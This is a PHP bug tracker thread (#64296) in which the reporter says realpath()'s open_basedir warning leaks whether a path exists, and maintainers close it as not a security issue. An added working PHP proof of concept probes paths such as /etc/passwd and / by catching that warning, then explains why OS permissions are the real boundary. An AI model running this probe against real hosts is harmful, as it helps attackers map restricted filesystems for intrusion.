Sec Bug #64296 PHP Realpath Directory Listing
Submitted: 2013-02-25 13:35 UTC Modified: 2021-05-20 12:18 UTC
From: security at hoax dot io Assigned: cmb (profile)
Status: Not a bug Package: Safe Mode/open_basedir
PHP Version: Irrelevant OS: *NIX & WIN
Private report: No CVE-ID: None
 [2013-02-25 13:35 UTC] security at hoax dot io
Description:
------------
realpath() is quite verbose, thus allowing attackers to check if files and folders
exist using the following regex: $regexp = "/File\((.*)\) is not within/";

This has been tested on:
5.4.11 & Above

For a Full PoC please check the Test Script


Test script:
---------------
http://pastebin.com/4LTrARUj


Expected result:
----------------
The Directory List of /

Actual result:
--------------
The Directory List of /

 [2013-03-05 18:37 UTC] johannes@php.net
This is not specific to realpath but applies to most/all functions which are affected by open_basedir. I don't think open_basedir should or can provide full secrecy. Doing that is the role of the operating system (file system access rights, chroot, ...). The purpose of open_basedir is, in my opinion, more a safety net than a top security feature.

Leaving this open for others to comment, though.
 [2013-03-06 09:33 UTC] security at hoax dot io
Why should open_basedir be treated as a safety net?

If an 'end user' can bypass the safety function of open_basedir and Safe Mode, it should
be fixed, right?
 [2021-05-20 12:18 UTC] cmb@php.net
-Status: Open +Status: Not a bug -Assigned To: +Assigned To: cmb
 [2021-05-20 12:18 UTC] cmb@php.net
If an attacker can run arbitrary scripts, all bets are off.  We do
not classify that as security issue[1].  And having detailed info
regarding the file names in the error log, or on screen during
development is a useful feature, not a bug.

[1] <https://wiki.php.net/security#not_a_security_issue>
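The oracle the report describes, and the point made in the first reply (open_basedir is a safety net, not a secrecy boundary), as an added example that is not part of the bug thread or of PHP's own code. realpath() resolves the path first, which only succeeds if it exists, and only then runs the open_basedir check, which raises the "File(...) is not within the allowed path(s)" warning. A script therefore learns whether a path exists from the presence of the warning, never from the return value. The probe paths and the per-script tightening of open_basedir to __DIR__ are constructed for this example; the regex is the one from the report, verbatim. It assumes a *NIX host.

```php
<?php
declare(strict_types=1);

// Added example, not from the bug report or from PHP's sources.
// Existing path outside open_basedir  -> realpath() returns false AND emits
//   "realpath(): open_basedir restriction in effect. File(/etc/passwd) is not
//    within the allowed path(s): (/var/www)"
// Non-existent path                   -> realpath() returns false, no warning.
// The warning text, not the return value, leaks existence.

// Narrow open_basedir to this script's directory; it may be tightened at
// runtime but never widened. Assumption: __DIR__ is not "/" itself.
ini_set('open_basedir', __DIR__);

/**
 * true  -> $path exists but lies outside open_basedir (warning observed)
 * false -> $path does not exist (realpath failed silently)
 * null  -> $path is inside open_basedir (realpath succeeded; oracle moot)
 * The file is never opened or read; only the warning text is inspected.
 */
function probe_outside_basedir(string $path): ?bool
{
    $leaked = null;

    // Intercept the E_WARNING before display_errors or error_log sees it,
    // so the probe works regardless of how errors are surfaced.
    set_error_handler(
        function (int $errno, string $errstr) use (&$leaked): bool {
            // Regex copied from the original report.
            if (preg_match('/File\((.*)\) is not within/', $errstr, $m)) {
                $leaked = $m[1];
            }
            return true; // handled: suppress PHP's own output of the warning
        },
        E_WARNING
    );
    $resolved = realpath($path);
    restore_error_handler();

    if ($resolved !== false) {
        return null; // inside open_basedir: nothing to infer
    }
    return $leaked !== null; // false + warning = exists; false alone = absent
}

// Constructed probe set (assumption: *NIX host; use drive paths on Windows).
$probes = [
    '/etc/passwd',                                   // present on nearly every *NIX host
    '/etc/no-such-file-' . random_int(1, 1 << 30),   // absent
    '/',                                             // directories resolve too
    __FILE__,                                        // inside open_basedir
];
foreach ($probes as $p) {
    $r = probe_outside_basedir($p);
    printf("%-45s %s\n", $p,
        $r === null ? 'inside open_basedir (realpath ok)'
                    : ($r ? 'EXISTS (leaked by warning)' : 'absent (no warning)'));
}
```

Two practical consequences follow from the code. First, display_errors=Off and log_errors=On only change where the warning is delivered; any script that runs can install its own handler and read the text, which is why the final comment treats "attacker can run scripts" as outside open_basedir's threat model. Second, the oracle only works because the PHP process is allowed to resolve the path at the OS level. If the web server user lacks search permission on a parent directory, realpath() fails before the open_basedir check for existing and absent entries alike, with no warning either way, and the distinction disappears; that OS-level control (filesystem permissions, chroot, containers) is the boundary the first reply points to.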
 